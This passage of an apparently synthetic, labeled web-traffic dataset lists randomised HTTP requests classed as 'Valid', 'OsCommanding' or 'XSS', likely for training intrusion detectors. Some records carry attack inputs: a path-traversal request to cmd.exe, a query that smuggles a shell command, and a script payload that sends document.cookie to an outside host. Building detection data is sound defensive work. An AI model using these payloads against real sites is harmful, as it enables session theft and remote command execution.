Authorization: Digest nc=BB724D59
Range: 65473-
Referer: http://ettossb.gov/egchr/L1qu/dipfegAg.fgf
TE: trailers,gzip,trailers
Trailer: Range
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 2.4; ts-sg; rv:5.3.3) Gecko/10526234
UA-CPU: 68000
UA-Disp: 611,8955,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 519x8664
Via: 9.7 7.157.181.151, FTP/9.5 www.3iios.js:2628, 5.0 181.26.114.202
Transfer-Encoding: compress
Upgrade: bee/3.6, 1bth/0.7, eduf0l/1.3
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 108.95.130.193
X-Serial-Number: 2432854713
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17593
Start - Id: 24309
class: Valid
GET /0ios2ijlibzIsrR1jETr/iUltoqNH/nEtmpyXT5KK0amk7Z/d7/gblregorwu/elI9iW.gPx0X-Hjx_E-W/se3qEatdeaivoukorl/7Tinosynisefs/fVC4/Epnm8q/tynjseteamomsywPe/r@FeMluyxY2@cBq.exe? HTTP/1.1
Host: 148.242.219.131
Connection: 18Oks
Accept: */*
Accept-Charset: cp-936;q=0.9, koi8-r;q=0.3, utf-7;q=0.9, gb2312, cp-936;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=57580
Client-ip: 88.130.110.165
Cookie: tmDi0a0nnpa=obche0rlir
Cookie2: $Version="816"
Date: Wed, 09 Dec 09 03:45:42 GMT
ETag: W/"SiGTqqqgbzI6lKln"
Expect: 100-continue
From: euoirM@EiaLnegsw.de
If-Modified-Since: Fri, 25 Dec 09 08:51:46 GMT
If-Unmodified-Since: Fri, 08 Oct 04 24:47:17 UTC
If-Match: *
If-None-Match: "rCah_GuZRgblrTlsK"
If-Range: Tue, 10 Nov 09 14:22:40 UTC
Max-Forwards: 10
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: awes tupa=rsrn
Authorization: Digest nonce
Range: -375
Referer: /i8Eu/dsgyoab/a1In3e.tar.gz
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.3 (compatible; Konqueror/8.2; Solaris; qsae; enOcssld)
UA-CPU: 68000
UA-Disp: 6044,928,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 982x566
Via: sdrab/7.5 61.104.92.64, 5.6 www.ilos0kqf.gif
Transfer-Encoding: compress
Upgrade: oim/4.7, Rammnl/5.0, ati/2.2, tbnvY/2.5, ceta/8.2
Warning: 498 85.143.4.214 "roAwsenwaqe" 
X-Forwarded-For: 76.236.144.82
X-Serial-Number: 05617970292195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24309
Start - Id: 14027
class: Valid
GET /wps@K@_catIMH/rlesMsec/n4mwnfonhaoiWoet9/NElfbwHWT/8FFI/uuuThlj/aw5/ee.pl?snNomTis3M9n4e=gwNthlr&suds=eCJcoGlVdErX&lhlSm=6&nhaigmnldels=neret&u8IowreTfas=+8 HTTP/1.0
Host: 19.106.97.165
Connection: 0lok
Accept: */*
Accept-Charset: gb2312;q=0.6, iso-2022-jp;q=0.9, us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4633
Client-ip: 96.142.255.82
Cookie: DatBdri6tm1a4=578;q4c0taee14Eruib=aiPbH.
Cookie2: $Version="19"
Date: Wed, 02 Sep 09 24:54:43 GMT
ETag: "BL8IO2.W.cvsQdvjJOWQ"
Expect: 100-continue
From: aeeaqe@ea10ef.st
If-Modified-Since: Sun, 10 Aug 08 12:12:58 GMT
If-Unmodified-Since: Wed, 07 Jul 04 18:54:07 GMT
If-Match: *
If-None-Match: "@xjAXGNOyoNjSrU"
If-Range: Fri, 14 Nov 08 15:17:24 GMT
Max-Forwards: 5
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic YXZlMzU6aTJtdTVlUmk=
Authorization: Basic cm9ybDpFbUhJdGVl
Range: -2,-28865
Referer: /dteEijUn/heahri/boir/ira78hb/oonzt7no.shtml
TE: trailers
Trailer: Date
User-Agent: Mozilla/7.1 (Windows; U; WinNT 1.9; np-al; rv:3.1.7) Gecko/29921181
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8443x481
Via: HTTP/1.5 www.ngnsi5es.js, HTTP/2.8 92.143.67.166, HTTP/9.8 177.127.12.213:72
Transfer-Encoding: deflate
Upgrade: eEeZe/7.4, Zmitao/2.6, hfrDo/5.0
Warning: 303 27.61.130.243 "4sxeeeopTs5wI" "Mon, 20 Nov 06 24:32:15 UTC"
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 0043438224132828242
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14027
Start - Id: 7798
class: Valid
POST /ijsesratmeoleoietl1/gunion9_IL-9PtDfDL/7ujNHX/epuegzo2aah/antatfnrOrtn/nn-bbV3gJZKF@DvAkLhr/h6nlqs.asmx? HTTP/1.0
Content-Length: 119
Content-Language: n
Content-Encoding: identity
Content-Location: /sicmo.jpg
Content-MD5: dG5waXN2dXQ2MEhuR3RuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Mar 04 05:51:02 GMT
Last-Modified: Mon, 27 Nov 06 24:58:33 UTC
Host: 7.228.75.42
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: me5vnyeu-eRimqi;q=0.4, oevsoaa-aRtdr, clelaeea-0t5uoY;q=0.4, h0ink-holrier;q=0.0, aaesDa3-rLg
Cache-Control: c='n'
Client-ip: 248.78.197.68
Cookie: eluxendfoc4i=576056;tTcSe=>gao we]eoera
Cookie2: $Version="5"
Date: Sun, 14 Sep 08 06:39:03 CET
ETag: "kyEeRm@mcrw1zHjoII"
Expect: 100-continue
From: msDNtTe@mtt5jy.de
If-Modified-Since: Thu, 23 Sep 04 22:16:16 UTC
If-Unmodified-Since: Mon, 09 Nov 09 01:12:33 CET
If-Match: "T4qbzxVD6pwcJ-_zQRII"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 8.5
Pragma: at8mmbf='ayh'
Proxy-Authorization: Basic VHNkZGF4OmJlbDVlcw==
Authorization: NTLM SHR0cW1pdnNPYWNhYW5Obmg3NmVhbzVscW0wamR5aXdhampkYzRtbmRu
Range: -43411,-175805,6-
Referer: http://www.0zwe.gov/deslean/zzuI/7byi6.tar
TE: trailers
Trailer: If-Range
User-Agent: osDLfdt http://www.qerwtgh.st
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 669x1617
Via: 4.8 89.72.48.85, HTTP/4.6 www.w5ta.js
Transfer-Encoding: gzip
Upgrade: hZ1Tjt/9.1, t5sa/5.7, ibgt1/8.3
Warning: 240 www.9cth.tiff:70 "nahs" "Fri, 31 Aug 07 19:06:50 CET"
X-Forwarded-For: 202.225.233.245
X-Serial-Number: 27066605
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6ltdr=1396880&ut=@irA&Oenidewao1aoh2=84756756&sdndgudaltn=ri7h&Wsystem6hy-=fez&1ez=hBjsnlaBtUEdf&HIM7Ml.9YY=761420512

End - Id: 7798
Start - Id: 43210
class: OsCommanding
GET /ef8tdTaFiahitp7rc/eYNnirscY3l/vF/amZw9dy-dx/aia8hw4pn.r1P8k/gu7tldne/nmo6mrhblifu5teD/hnlornon/tapss5pz8DHeui5R/mrSVaVDXSBKZ/rdeojRefaEc3rh8rpviq/grUg.dll?VAClPgX.Jnn=3333067&rwXr=%5Cn+uftp+++++-p+++++www.itterinanere.com+%2Fng%2Fetns%2Fchisme%2Fatasta%2Folenma%2Fnela&ulooquutfucs=medeletevM%27ncRccaeboot.initf+vi&tThltsxdhSun=dm3arsdnei6yrtn&qufut9Ltrs=wraF5na+o&ueoaoa6tlettno=dsa%289divedn60&exsnatoutos=3081764&eey7eieqa2tO=rcz_&naeeAiaOp3plws=m4I HTTP/1.1
Host: www.akocibnbli.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: rgm-irnhety;q=0.2, tTaro5o-krRnsnm;q=0.6
Cache-Control: no-cache
Client-ip: 59.228.253.1
Cookie: Ins=7
Cookie2: $Version="350"
Date: Wed, 21 Jan 09 24:32:04 GMT
ETag: W/"oGyzD5bjuhHnWjG"
Expect: nits
From: cfft@ri22Evh.org
If-Modified-Since: Sat, 11 Mar 06 07:09:55 UTC
If-Unmodified-Since: Sat, 09 Jul 05 12:08:03 GMT
If-Match: "_Izm4xKtl.Xnnh24E5mY"
If-None-Match: *
If-Range: Wed, 01 Oct 08 14:18:22 GMT
Max-Forwards: 18
MIME-Version: 7.7
Pragma: Eilb=e
Proxy-Authorization: mfey smnSW=fltvk
Authorization: NTLM c2FjdGVhaTg0aW9hMmNpcm8yQ2FyYWh4b3VjdDR1N2VlOHVJYQ==
Range: 2403-,12114-9,53-40810
Referer: /ojpmthc/ixlu/2eiben7i/leUzn.js
TE: chunked;q=0.4,gzip
Trailer: User-Agent
User-Agent: oXvfH3y http://www.dsae.cz
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 953x846
Via: 2.9 www.mrk97j.htm, HTTP/8.3 www.nOlsee.tiff, FTP/7.4 108.131.105.234
Transfer-Encoding: lauvse; eychmig=l1athgp
Upgrade: cieon/9.6, fEu/4.3, uUa/0.7, eme/1.4, aopoq/1.0
Warning: 067 www.whHhen8.tiff:01 "nyi9rr1Caal" 
X-Forwarded-For: 36.57.46.253
X-Serial-Number: 3512760212193
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43210
Start - Id: 44315
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.OrTl.uk:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, identity;q=0.1, compress;q=0.4, compress, identity;q=0.0
Accept-Language: tex-af;q=0.8
Cache-Control: no-store
Client-ip: 150.122.198.96
Cookie: 4o@scripthtpassgt=mtmewl%rsdocumentd;nbUn=aestbd)vnodeti~o;htqaieieVhdbaaN=+e;es=S6Leh2Sairsaanddndh;lbgftr=hxOee;iib=~otsy 
Cookie2: $Version="30"
Date: Fri, 29 Oct 04 19:37:09 GMT
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: T8dcgstj@o3Utp.fr
If-Modified-Since: Thu, 29 Dec 05 06:19:38 CET
If-Unmodified-Since: Thu, 12 Jul 07 18:14:05 GMT
If-Match: "CCiEzafJ6.IYM8u"
If-None-Match: "lwb5.bJassLthE5BqRF"
If-Range: *
Max-Forwards: 17
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: NTLM cG5tZWl0dDRhb2dvbk50Q3Nhb2RibmVhc2xzMXg5czZlV2hodHJobzBjOWlnaWlz
Range: -2
Referer: /idrnt/peta/sgmaibso.nsf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.6 (Windows; U; Win 9x 2.1; ot-bn; rv:7.3.2) Gecko/56561278
UA-CPU: MIPS
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: apeOl/9.9 www.edtlncmS.js
Transfer-Encoding: gzip
Upgrade: ott9i/7.1, tei/4.6
Warning: 284 www.natmB.jpeg:92644 "Hmt9" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44315
Start - Id: 11335
class: Valid
GET /YEKw/mShum0wa/lh48mieoaEr/rEnnijzt7ieEc8G.shtml? HTTP/1.0
Host: 227.59.83.247
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.8
Accept-Language: wmoue-denoia;q=0.2, ecns-a7
Cache-Control: no-transform
Client-ip: 131.29.29.182
Cookie: y43esa=ntn;armw=885296
Cookie2: $Version="8"
Date: Tue, 29 Dec 09 18:23:00 UTC
ETag: W/"IJEOSAGAHN4EGeeeM"
Expect: tnrs=resh;eeatour=aTDhmbR
From: ctiZoauS@st4hnahd.ch
If-Modified-Since: Sat, 30 Jan 10 21:35:37 GMT
If-Unmodified-Since: Wed, 07 Dec 05 21:14:48 UTC
If-Match: "SI4Fox1SwXAhh@Vr"
If-None-Match: *
If-Range: "Z-aHjjlO1omQmkS5m"
Max-Forwards: 6518
MIME-Version: 9.5
Pragma: lbe0r=edmntre
Proxy-Authorization: Digest opaque="ei6e3ho"
Authorization: Basic NHNseFA6ZXVlU2hvb2E=
Range: 9-,461-4858
Referer: /urFqnhbd/itnstEEI/96upno/j8aieat/aroni.asmx
TE: trailers,gzip
Trailer: Proxy-Authorization
User-Agent: eyYlF4Gl http://www.4Tsu.be
UA-CPU: x86
UA-Disp: 139,6791,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 953x845
Via: aAer/1.0 www.fQhhp.js:554, HTTP/4.8 www.srhnwE.htm, FTP/6.7 41.130.82.32:69
Transfer-Encoding: eoOddT; netshmt=9s5Uea
Upgrade: Nw09tn/3.8, th2li/5.0, nngEtL/3.9
Warning: 653 42.106.86.222 "1e9IMojedeurettAw" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 7492268797432274
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11335
Start - Id: 2156
class: Valid
GET /unr/vxWkd69BLe4Zqo/wy.jZMOjEv/uiiF7tMIJ/ieinm5aAagyo/aGHFe/on0n/cmdQfPuinsertmlDz.exe?INkti5cto=m&edNdsnatAoiqm=8133654&.htpasskBgHOtFBmN=583&az=l%3F2l&rthR8x=79997&yyr=lHl4KwfBYG&Iw4Thdtd=ntnsMo&6rmf6nkrhmn=ti&q85tmplsGzgq_I=919&kdnk=les%29+ HTTP/1.1
Host: www.uIslqseO.fr
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: compress
Accept-Language: se7ez-5Ei, 4n-ndq8uoo, luoyyoon-rtqu;q=0.7
Cache-Control: min-fresh=9251
Client-ip: 130.162.168.126
Cookie: o0Eecroe1mhhltl=26640;nFyweDyAWQ8G=22;R2NWrI=7;fUFBVD5Ppc=6712;eaeqde=ea-W
Cookie2: $Version="400"
Date: Fri, 15 May 09 24:59:16 CET
ETag: W/"4eoX3FjnHzJ3RDSMPkMS"
Expect: rcrct25y
From: cwaupt@0tmyctatse.net
If-Modified-Since: Fri, 13 Oct 06 06:31:59 UTC
If-Unmodified-Since: Sun, 01 Mar 09 11:54:12 CET
If-Match: *
If-None-Match: *
If-Range: "VBdA4f_F-scrUArKmM9"
Max-Forwards: 7
MIME-Version: 3.0
Pragma: d='tk'
Proxy-Authorization: Digest nonce
Authorization: Basic aWxoaHRwOlRudHRu
Range: -5,61-,-809
Referer: /r8Irdut/nth2rfm/seofbDr/gbyaaEei.php4
TE: deflate;q=0.7,trailers
Trailer: Connection
User-Agent: mtueeN
UA-CPU: MIPS
UA-Disp: 5906,5130,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 114x854
Via: 1.0 www.te8vd.html, 3.5 26.68.128.116
Transfer-Encoding: identity
Upgrade: zienis/1.2, iyetd7/7.3, isE8gA/1.8, ehh9m4/7.8, eeb/5.1
Warning: 722 4.238.114.92 "eaedoiYafssfmr6w" 
X-Forwarded-For: 186.3.114.97
X-Serial-Number: 9895241717803854226
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2156
Start - Id: 19271
class: Valid
GET /e2XudG0VV7c./wo3izafpulhmsuo3Nbm/0yennazOeYao/sNceaThw/edjmoeaieiii.pl?hPyf=hvd9BIxLZ&caTuhnJRo=137173&tI4Xr=1he4oi-ltof&yaEo=a+%7C%7C&qftstnhnbfung=4420764&rIOPaarkei4ea=7i&4JsaMyla7hDrn=neeyhhlLe5iewrisis&eheelcitosri=hroi&9esLsp=59950858&o1ashdv2wdw=https HTTP/1.1
Host: www.lssdelhwd.st:80
Connection: he2fhl
Accept: audio/*, audio/*;q=0.9, audio/*
Accept-Charset: windows-1258, x-mac-roman;q=0.3, iso-8859-9;q=0.6, windows-1251, x-mac-icelandic
Accept-Encoding: compress
Accept-Language: 0na-hhqViRd;q=0.0, jxhsool-t, n-cwxo;q=0.2
Cache-Control: max-age=36
Client-ip: 70.40.223.207
Cookie: co=47436
Cookie2: $Version="0"
Date: Wed, 28 May 08 23:57:53 GMT
ETag: W/"p1OvA.Ka.h.7uW@m-_J"
Expect: 100-continue
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Fri, 02 Mar 07 04:04:46 GMT
If-Unmodified-Since: Wed, 01 Mar 06 02:26:08 UTC
If-Match: *
If-None-Match: "I7f6UUE6lpi402UKaCUK"
If-Range: "DNVe-Pk1QmN8sBO_c"
Max-Forwards: 73
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic OGVlYm9zOnJpYm5z
Authorization: tisen yeolbcot=iseyfh
Range: 784688-250,21331-
Referer: http://www.rwDhNR.gov/mtnwiotb/ihyoeral/di6srrs/hewe6/4rahe.pl
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: matstae (hNBo4V)
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3141x1930
Via: 5.0 7.40.95.228, 7.3 100.242.116.63
Transfer-Encoding: lbcpn
Upgrade: e1En/4.6, xtnec/2.1, tlslos/3.4
Warning: 197 33.215.121.199 "ikjti0rMM2eujtmcrtse" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 9449632282194907610
----: --------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 19271
Start - Id: 47240
class: XSS
GET /HHHnodemhtaccesAn1X.html?alfa=fiieapimirX&lgTn8=12981267&ss=admin&dqited6edys=235808&lSPestveceea=%26%3Cscript+++%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.enalesri.com%2Fcgi-bin%2Falmeasas.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E&dK@6Bc=nnwakhserkaLnfsd9&jkKE4TSlfimg=exS4dU_.&ni9tmaHensea=fPnagdropdiviVe%2B-u%3C%3A%26hp&aOo6oEhuNe=+2hoaCsdDtndn&tteTbslesiDR=-r&ti8hWokdma=L%2Faoch&vbscript5winntBG=-Aeyxsfh%5Cl9a&owcci2m=7t-htiu%26by%5Bn0include HTTP/1.0
Host: 88.151.240.213
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312, utf-8;q=0.6, x-mac-chinesesimp, windows-1254, utf-7;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 100.78.98.252
Cookie: Heiooc=iscC8;td4rlosmhrrznq=otUq@sAUI;caom=30;5wp-.Cd=01;Uptenojr=uAqLKC0cujn
Cookie2: $Version="66"
Date: Mon, 03 Jul 06 07:46:53 UTC
ETag: "5vTe1bZxzLc.pyDKOkp."
Expect: 100-continue
From: npuaaot@jotm34.net
If-Modified-Since: Sun, 04 Apr 10 03:26:15 GMT
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: *
If-None-Match: "Z4LV9FHYLJ8Svn8ND"
If-Range: *
Max-Forwards: 619
MIME-Version: 8.0
Pragma: Rrohe=sortdt1h
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest uri=/wseovhc/h9OWo.nsf
Range: -3
Referer: /arlc6e/zwdozsec/taaylo/Skd2clta/nsaw.gz
TE: trailers,trailers,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/3.8 (compatible; MSIE 3.2; Linux i386; Ispdaxhg)
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/4.8 www.1rmIlfe.js, HTTP/0.9 www.q03r.js:8, 2aae/0.4 www.wao7.tiff
Transfer-Encoding: identity
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 011 www.oca0haoj.js:3920 "uneuy500c" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 81818061997454
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47240
Start - Id: 27041
class: Valid
GET /nyvc2/aeoatseetijn8e/cviD8-ojiLw6/oregandi3esiaeg7/wfonue.dll? HTTP/1.1
Host: www.tnjjiar2.net
Connection: close
Accept: application/*;q=0.6, application/*;q=0.7, text/*
Accept-Charset: iso-2022-jp;q=0.7, windows-1250, hz-gb-2312;q=0.4, iso-8859-7, windows-1254;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: d7s9yhea=tttkan
Client-ip: 48.35.201.58
Cookie: g6nGvhei=8tnoali delete7srml[idzsg;f9=tu4JtdfgQXPj;cfw=dhibidf6mbpf
Cookie2: $Version="2"
Date: Tue, 30 Mar 10 16:46:22 GMT
ETag: W/"Q2o9leRJa@r_IgZQ"
Expect: reirrd
From: caaati2g@ijas.biz
If-Modified-Since: Sun, 03 Oct 04 13:14:18 UTC
If-Unmodified-Since: Sun, 16 Apr 06 04:42:37 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3923
MIME-Version: 2.2
Pragma: c=tetllkF
Proxy-Authorization: Digest username="onne"
Authorization: NTLM dzA2b2Q1YWZlZW5JSWFQaTZhYUluU2JIZWxFZ3JuVG1tcm5tZ2VvYnA=
Range: 34-,11052-0053,7-3
Referer: http://www.eoIa.com/fnhtt/dlgteBe.asmx
TE: chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: sessua9zetnye
UA-CPU: MIPS
UA-Disp: 2539,8756,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6860x985
Via: 9.6 58.18.73.230, 1.6 124.45.183.34:97, 6.0 233.196.201.42
Transfer-Encoding: deflate
Upgrade: oleg/7.0, eesLi/0.3, s6tY/7.4, Ehnhw1/4.6
Warning: 487 190.19.226.50 "taog3tlnve" "Mon, 04 Jul 05 09:35:24 CET"
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 894392
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27041
Start - Id: 16316
class: Valid
GET /aonifoigprtOjt/etsgmtaleo1rs/e1sQ-aSV3QKPbP/onolbeasjSprvToee/z9lree5hduhz7dfr/hk/nyedidouRqnii/0RrMcPr1lTV7q-0qF6WH/ycpzNassorngrtaqxl/WqscriptA/n.zBGP.html?eYiud=3&aSdatePum8dOhf=ofalet&u2ylhseiep=858155759&tf=9oHtn0iRurdTnF&orcjnope4=gauoC%40W&ntiorar=76&bsmas=51062515&esl0Ennd=nw&6me5cbenatl=tA%40mueb&rs=fx&weostp=27457 HTTP/1.1
Host: 29.20.147.197
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.7
Accept-Language: gblo-aoinrcw, d-CUl, latI-iarD;q=0.1, 8vbjelhe-k
Cache-Control: only-if-cached
Client-ip: 76.128.152.96
Cookie: c4pGDxY=8449050140;ell48ee=i7;KL2Ptq=39205;sdncy=7zeF?p0fth$o0 osie);hnndatolc=a9tsy;e7usnkhEds=iYeSMu@nUw
Cookie2: $Version="93"
Date: Fri, 04 Aug 06 03:27:29 CET
ETag: W/"m228@VjK5vilePYC"
Expect: 100-continue
From: fewlhd@mrbErs.biz
If-Modified-Since: Thu, 03 Dec 09 03:32:18 GMT
If-Unmodified-Since: Thu, 03 Sep 09 06:11:47 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: oihi 3dsNzs=oieTiadk
Authorization: Basic Z29udXRCY2E6YWNtZg==
Range: -652120,9-,091-
Referer: http://utrdA.biz/z07DoSen.jsp
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.4 (Windows; U; Win98 5.3; aa-Nl; rv:0.1.1) Gecko/55469147
UA-CPU: PowerPC
UA-Disp: 6300,4567,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 885x6451
Via: FTP/8.6 www.aqt3n.css
Transfer-Encoding: identity
Upgrade: znuO/5.9, rnoe23/2.5, sutmh/9.2, Paxtie/5.0, dcrIu3/2.7
Warning: 902 73.181.232.48 "htuwwet8tesasuA" 
X-Forwarded-For: 126.236.238.240
X-Serial-Number: 39357482225884778580
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16316
Start - Id: 19989
class: Valid
GET /r9opt0SfNcW5/e9kmD03psEJXQ/@Tb_ninsertwC5--t9./Uo0sibueyHo/5XDL@1nwp-/ggGqkdPDPPQ9LEb9Z.jsp?catB.nii0N=io9ogtok&qW1tbiu2enh=ezyisens2tieO6e&tx3gwJ=9270&sncFe=836731&ouvsem7dtdteons=4071&Obtinenr4tnmze=hTFYx9CVM4yt&L1Lg6childO_=opthniihu40t7ettl&mh4jOde=9&gseyhtAe=sul&roodrokih8Y2s1d=q.H.-.S HTTP/1.1
Host: www.onannot.org
Connection: close
Accept: audio/*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 1.248.95.139
Cookie: tdlafqlnt81f=tpWrTeaaO8;eahTnjto=styleer aad piad
Cookie2: $Version="3"
Date: Fri, 04 Feb 05 18:35:01 UTC
ETag: "3iVJchcz332gZ6_Q"
Expect: 100-continue
From: z3on9@atfseid.cz
If-Modified-Since: Tue, 25 Apr 06 03:06:05 CET
If-Unmodified-Since: Wed, 26 Nov 08 07:50:35 UTC
If-Match: "uln0kRNkxjawC0hkGxWX"
If-None-Match: "WXhNTuk0E_wyFQc@R"
If-Range: "O@z7myecreJXWCvg"
Max-Forwards: 3923
MIME-Version: 5.2
Pragma: 8m3t='lxegLhum'
Proxy-Authorization: saasm Bhhq=rsbnXfm
Authorization: fVtifb z6sasiD=Nrae
Range: 2515-,-14,1-75
Referer: /raxu/Sroeg3Ap/n4iS/eeSa.sh
TE: gzip;q=0.0,trailers
Trailer: Range
User-Agent: egZs49vu/4.2.3
UA-CPU: MIPS
UA-Disp: 162,7111,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1394x7760
Via: 5.5 89.42.84.106:3247, HTTP/5.2 10.62.203.151, FTP/2.2 11.27.156.252
Transfer-Encoding: compress
Upgrade: fuse/0.1, nec/0.2, daue/4.4
Warning: 004 www.ogtrissi.png "oitithegayxtvR" "Thu, 22 Jan 04 08:11:35 UTC"
X-Forwarded-For: 39.120.128.67
X-Serial-Number: 81008512960196254
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19989
Start - Id: 20856
class: Valid
GET /siEpiignrlH/maxmobbath/JeJbgsound/rrubhqogtvrihher/lV4/kT-5FDC7/ANdiv5LAinclude43Bzlike/4smnZ/sA_7v.W3bH@-/iditepob6oere.htm?J3H0wR=v%5Dtn&Rseeilhpegs7s4O=ne%40winnt%7C&Pl5uTgZV8Dxd=80&AmoeYshelhse3h=3&wosopuQjose=mlcht HTTP/1.1
Host: 250.253.230.167
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: njm1t-o;q=0.4, lowyhn-jowaB
Cache-Control: min-fresh=67717
Client-ip: 186.115.77.25
Cookie: naAYfd=ret9
Cookie2: $Version="34"
Date: Wed, 06 Apr 05 17:19:37 UTC
ETag: W/"A2kCx.Z.-Tbv5vaIQE-y"
Expect: 100-continue
From: dnCSe5st@sqeawRtsa.cz
If-Modified-Since: Sun, 16 Oct 05 17:30:44 UTC
If-Unmodified-Since: Mon, 29 Dec 08 12:40:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 269
MIME-Version: 8.4
Pragma: qEnn=tmayOIbs
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bWZlZXQ6d2VneXRsSW0=
Range: 3653-5656
Referer: /ejerHg/doofHay/A2lPh.swf
TE: chunked,trailers,trailers
Trailer: Referer
User-Agent: codaNi6/4.1.2
UA-CPU: Sparc
UA-Disp: 550,7756,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 691x8896
Via: 6.2 181.207.160.6
Transfer-Encoding: deflate
Upgrade: deqrsi/3.0
Warning: 296 214.47.11.12 "2nWtseAGip4" 
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 20856
Start - Id: 1290
class: Valid
GET /5r.pXEjT4eb4XDp0cG/qxNtJ_e7TN.gif?dgq2e4d=+etRt&nVl3connect3zb=t6nO0tt&5oFN=ezPUBbs&VSAI=a%25useu9nrWst%3Baoadmin+&hAch=rqninluebsueT&2so=aBL.dl%405RN&vns3rbm=15583465&alStwcsmespit=pyd HTTP/1.0
Host: 68.78.82.225
Connection: iedE
Accept: image/gif
Accept-Charset: *
Accept-Encoding: 
